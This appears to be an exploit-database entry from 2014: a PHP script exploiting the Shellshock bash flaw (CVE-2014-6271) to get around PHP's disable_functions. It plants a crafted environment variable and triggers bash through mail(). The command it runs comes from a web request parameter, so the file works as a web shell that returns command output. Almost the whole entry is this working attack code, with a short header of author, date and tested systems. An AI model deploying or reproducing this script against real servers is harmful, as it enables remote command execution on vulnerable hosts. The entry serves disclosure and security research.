# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
#
Date
: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http:
//php.net
# Software Link: http:
//php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7
and
CentOS 5
and
6
# CVE: CVE-2014-6271
<?php
function
shellshock(
$cmd
) {
// Execute a command via CVE-2014-6271 @
mail.c:283
if
(
strstr
(
readlink
(
"/bin/sh"
),
"bash"
) != FALSE) {
$tmp
= tempnam(
"."
,
"data"
);
putenv(
"PHP_LOL=() { x; }; $cmd >$tmp 2>&1"
);
// In Safe Mode, the user may only alter environment variables
whose names
// begin with the prefixes supplied by this directive.
// By default, users will only be able to set environment variables
that
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is
empty
,
// PHP will let the user modify ANY environment variable!
mail(
"a@127.0.0.1"
,
""
,
""
,
""
,
"-bv"
);
// -bv so we don't actually
send any mail
}
else
return
"Not vuln (not bash)"
;
$output
= @
file_get_contents
(
$tmp
);
@unlink(
$tmp
);
if
(
$output
!=
""
)
return
$output
;
else
return
"No output, or not vuln."
;
}
shellshock(
$_REQUEST
[
"cmd"
]);
?>